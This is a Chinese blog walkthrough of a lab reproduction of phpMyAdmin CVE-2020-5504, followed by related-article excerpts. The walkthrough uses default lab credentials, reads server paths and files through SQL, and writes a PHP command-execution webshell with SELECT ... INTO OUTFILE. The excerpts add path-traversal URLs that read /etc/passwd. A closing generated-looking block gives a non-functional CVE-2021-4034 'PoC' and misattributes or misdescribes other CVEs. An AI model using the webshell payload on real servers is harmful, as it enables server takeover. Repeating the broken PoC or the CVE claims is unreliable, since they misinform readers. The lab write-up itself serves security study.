phpmyadmin SQL注入 (CVE-2020-5504)复现

最新推荐文章于 2024-12-28 16:36:45 发布
原创 最新推荐文章于 2024-12-28 16:36:45 发布 · 3k 阅读 · 16 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#mysql #安全 #网络

本文介绍了phpMyAdmin,一款免费的基于Web的MySQL数据库管理工具。指出在用户帐户页面存在SQL注入漏洞,恶意用户可注入自定义SQL。还给出了漏洞复现步骤,包括进入登陆页面、执行查询命令、查看返回数据包、构造木马及获取flag等。

工具简介

phpMyAdmin是Phpmyadmin团队的一套免费的、基于Web的MySQL数据库管理工具。该工具能够创建和删除数据库,创建、删除、修改数据库表,执行SQL脚本命令等。

漏洞描述

在用户帐户页面中发现了一个SQL注入漏洞。创建对此页面的查询时,恶意用户可能会注入自定义SQL来代替其自己的用户名。攻击者必须具有有效的MySQL帐户才能访问服务器。

漏洞复现

1、打开vulfocus靶场 访问IP后面加上/pma/index.php 进入登陆页面

提示的账号密码root 123456

2、点击SQL 输入 select @@datadir(查询数据库的路径)

3、输入 select @@basedir(查询MYSQL数据库的安装路径)

4、查看 SELECT load_file('/var/www/html/pma/index.php')

返回数据包3kb,一看就有东西,就对了。所以网站绝对路径为/var/www/html/pma

5、构造木马

select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE '/var/www/html/pma/shell.php'

6、使用写入的参数cmd传入值 获取flag

恸.283
关注
phpmyadmin SQL注入CVE-2020-5504
千寻的博客
03-07 1711
phpMyAdminphpMyAdmin团队的一套免费的、基于Web的MySQL数据库管理工具。该工具能够创建和删除数据库,创建、删除、修改数据库表,执行SQL脚本命令等。该漏洞源于基于数据库的应用缺少对外部输入SQL语句的验证。攻击者可利用该漏洞执行非法SQL命令。
phpmyadmin漏洞分析复现
weixin_43047908的博客
08-19 1594
目录前言环境搭建漏洞复现CVE-2016-5734CVE-2018-12613 前言 phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径,尤其要处理大量资料的汇入及汇出更为方便。其中一个更大的优势在于由于phpMyAdmin跟其他PHP程式一样在网页服务器上执行,但是您可以在任何地方使用这些程式产生的HTML页面,也就是于远端管理MySQL
phpmyadmin SQL注入(CVE-2020-5504)
m0_65150886的博客
02-26 999
Phpmyadmin <= 5.00和Phpmyadmin <= 4.94时,在用户帐户页面中存在一个SQL注入漏洞。创建对此页面的查询时,恶意用户可能会注入自定义SQL来代替其自己的用户名。是Phpmyadmin团队的一套免费的、基于Web的MySQL数据库管理工具。5.查看 SELECT load_file('/var/www/html/pma/index.php')所以网站绝对路径为/var/www/html/pma。1.访问http://ip:port,出现如下页面,开始实验。
Phpmyadmin 后台sql注入漏洞(CVE-2020-5504
玄道的网安博客
11-29 3685
漏洞概述 在用户帐户页面中发现了一个SQL注入漏洞。创建对此页面的查询时,恶意用户可能会注入自定义SQL来代替其自己的用户名。攻击者必须具有有效的MySQL帐户才能访问服务器。 查看补丁 修改了username处,这就是注入点了 影响版本 Phpmyadmin <= 5.00 Phpmyadmin <= 4.94 漏洞复现 phpmyadmin5.0下载地址 https://files.phpmyadmin.net/phpMyAdmin/5.0.0/phpMyAdm.
漏洞复现-phpmyadmin_SQL注入CVE-2020-5504
qq_58683895的博客
10-27 1261
phpMyAdminPhpmyadmin团队的一套免费的、基于Web的MySQL数据库管理工具。该工具能够创建和删除数据库,创建、删除、修改数据库表,执行SQL脚本命令等。在用户帐户页面中发现了一个SQL注入漏洞。创建对此页面的查询时,恶意用户可能会注入自定义SQL来代替其自己的用户名。攻击者必须具有有效的MySQL帐户才能访问服务器。路径:/pma/index.php 密码root:123456。证明有东西,应该就是首页,那网站的路径即为/var/www/html/pma。
[Vulfocus解题系列] phpmyadmin SQL注入CVE-2020-5504
00勇士王子的博客
10-01 4469
漏洞介绍 名称: phpmyadmin SQL注入CVE-2020-5504) 描述: phpMyAdminPhpmyadmin团队的一套免费的、基于Web的MySQL数据库管理工具。该工具能够创建和删除数据库,创建、删除、修改数据库表,执行SQL脚本命令等。 在用户帐户页面中发现了一个SQL注入漏洞。创建对此页面的查询时,恶意用户可能会注入自定义SQL来代替其自己的用户名。攻击者必须具有有效的MySQL帐户才能访问服务器。 解题过程 1.访问题目环境,因为这个漏洞是phpmyadmin的后台漏洞,
phpmyadmin SQL注入CVE-2020-5504复现
YouthBelief的博客
11-11 5318
phpmyadmin SQL注入CVE-2020-5504phpmyadmin SQL注入CVE-2020-5504)0x01 漏洞描述0x02 影响范围0x03 漏洞复现漏洞利用0x04 漏洞修复 phpmyadmin SQL注入CVE-2020-5504) 0x01 漏洞描述 phpMyAdminPhpmyadmin团队的一套免费的、基于Web的MySQL数据库管理工具。该工具能够创建和删除数据库,创建、删除、修改数据库表,执行SQL脚本命令等。 在用户帐户页面中发现了一个SQL注入漏洞
phpmyadmin SQL注入 漏洞(CVE-2020-5504
xy_wjyjw的博客
10-31 922
输入 select @@datadir(查询数据库的路径),根据镜像给的信息(后台路径和用户名密码)进行访问并登录。所以网站绝对路径为/var/www/html/pma。输入 select @@basedir(查询。使用传入的参数cmd传入值,获取flag。phpmyadmin SQL注入。返回数据包3kib,一看就有东西。登录成功进入后台,点击sql
【漏洞复现-phpmyadmin-SQL注入】vulfocus/phpmyadmin-cve_2020_5504
10-12 3252
phpmyadmin-SQL注入】写马
VULFOCUS靶场CVE-2020-5504漏洞复现拿flag
u013345705的博客
07-18 3072
VULFOCUS CVE-2020-5504
phpmyadmin-CVE-2018-12613复现
chenyy95的博客
05-29 634
攻击者利用发现在服务器上包含(查看和潜在执行)文件的漏洞。该漏洞来自一部分代码,其中页面在phpMyAdmin中被重定向和加载,以及对白名单页面进行不正确的测试。
PhPMyadmin-漏洞复现
weixin_57682301的博客
08-03 847
前情提要:首先将我们的PHP版本设置在5.5以上。
PhPMyadmin-cms漏洞复现
mirliasheong的博客
12-28 660
所以我们推测web路径为D:/phpstudy/phpstudy_pro/WWW。输入select @@datadir我们可以看到mysql路径。再用蚁剑连接一下试试。
phpMyAdmin 漏洞复现教程
2201_75891821的博客
08-03 738
然后我们更改日志保存路径然后查看是否更改成功 显示 更改成功然后我们插入一句话木马访问一下木马然后使用工具连接。
vulfocus phpmyadmin SQL注入CVE-2020-5504
weixin_61913198的博客
10-19 700
描述: phpMyAdminPhpmyadmin团队的一套免费的、基于Web的MySQL数据库管理工具。该工具能够创建和删除数据库,创建、删除、修改数据库表,执行SQL脚本命令等。然后来到sql命令执行处可以直接执行sql命令,现在想要上传webshell需要找到网站绝对路径,常规思路让网站报错或者找phpinfo,找了一大圈没找到,这个时候就需要猜网站绝对路径了,还记得前面那个nginx嘛?访问http://ip/pma/index.php登陆,账号密码为admin 123456。
phpMyAdmin $_REQUEST参数发现SQL注入漏洞
phphot
04-07 1970
发布日期:2008-03-01更新日期:2008-03-04受影响系统:phpMyAdmin phpMyAdmin 不受影响系统:phpMyAdmin phpMyAdmin 2.11.5描述:BUGTRAQ ID: 28068phpMyAdmin是用PHP编写的工具,用于通过WEB管理MySQLphpMyAdmin使用$_REQUEST而不是$_GET和$_POST变量作为其参数来源,并且在SQ
在vulhub复现完毕CVE-2021-4034、CVE-2018-12613、CVE-2018-18778、cve-2020-17518;并提交对应的漏洞复现步骤文档;
最新发布
08-26
### CVE-2021-4034 漏洞复现步骤 CVE-2021-4034 是一个存在于 Polkit 的 pkexec 组件中的本地提权漏洞。该漏洞利用了 pkexec 对命令行参数处理中的缺陷,攻击者可以利用此漏洞在受影响的系统上以 root 权限执行任意代码。 **复现步骤**: 1. **确认目标系统是否受影响**:检查系统是否安装了 Polkit 并且版本是否低于 0.117。可以通过以下命令查看版本: ```bash pkexec --version ``` 2. **下载并编译 PoC 代码**:利用已知的 PoC 代码来验证漏洞的存在。以下是一个简单的示例: ```c #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/types.h> #include <sys/wait.h> int main() { char *argv[] = {"/usr/bin/pkexec", "--user", "root", "/bin/sh", "-c", "id", NULL}; execve("/usr/bin/pkexec", argv, NULL); return 0; } ``` 编译并运行此代码: ```bash gcc -o exploit exploit.c ./exploit ``` 3. **验证漏洞利用**:如果成功,攻击者可以获得 root 权限。可以通过检查输出的 `uid` 和 `gid` 来确认是否获得了 root 权限。 ### CVE-2018-12613 漏洞复现步骤 CVE-2018-12613 是一个存在于 phpMyAdmin 中的文件包含漏洞。攻击者可以通过构造特定的 URL 来包含任意文件,从而导致远程代码执行。 **复现步骤**: 1. **确认目标系统是否受影响**:确保目标系统运行的是受影响版本的 phpMyAdmin(4.8.x)。 2. **构造恶意请求**:使用特定的 URL 路径来触发文件包含漏洞。例如: ``` http://127.0.0.1:8080/index.php?target=db_sql.php%3f/../../../../../../../../etc/passwd ``` 其中 `%3f` 是 `?` 的 URL 编码,用于绕过某些过滤机制。 3. **验证漏洞利用**:通过访问上述 URL,检查是否能够成功读取 `/etc/passwd` 文件或其他敏感文件的内容。 ### CVE-2018-18778 漏洞复现步骤 CVE-2018-18778 是另一个存在于 phpMyAdmin 中的文件包含漏洞,类似于 CVE-2018-12613。攻击者可以通过构造特定的 URL 来包含任意文件。 **复现步骤**: 1. **确认目标系统是否受影响**:确保目标系统运行的是受影响版本的 phpMyAdmin(4.8.x)。 2. **构造恶意请求**:使用特定的 URL 路径来触发文件包含漏洞。例如: ``` http://127.0.0.1:8080/index.php?target=phpinfo.php%3f/../../../../../../../../etc/passwd ``` 其中 `%3f` 是 `?` 的 URL 编码,用于绕过某些过滤机制。 3. **验证漏洞利用**:通过访问上述 URL,检查是否能够成功读取 `/etc/passwd` 文件或其他敏感文件的内容。 ### CVE-2020-17518 漏洞复现步骤 CVE-2020-17518 是一个存在于 Apache Flink 中的远程代码执行漏洞。攻击者可以通过构造特定的请求来触发此漏洞,从而在目标系统上执行任意代码。 **复现步骤**: 1. **确认目标系统是否受影响**:确保目标系统运行的是受影响版本的 Apache Flink(1.11.0 至 1.11.2)。 2. **构造恶意请求**:使用特定的 HTTP 请求来触发远程代码执行漏洞。例如,利用 Flink Web UI 的作业提交功能,上传包含恶意代码的 JAR 文件。 3. **验证漏洞利用**:通过上传并执行恶意 JAR 文件,检查是否能够在目标系统上执行任意命令。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值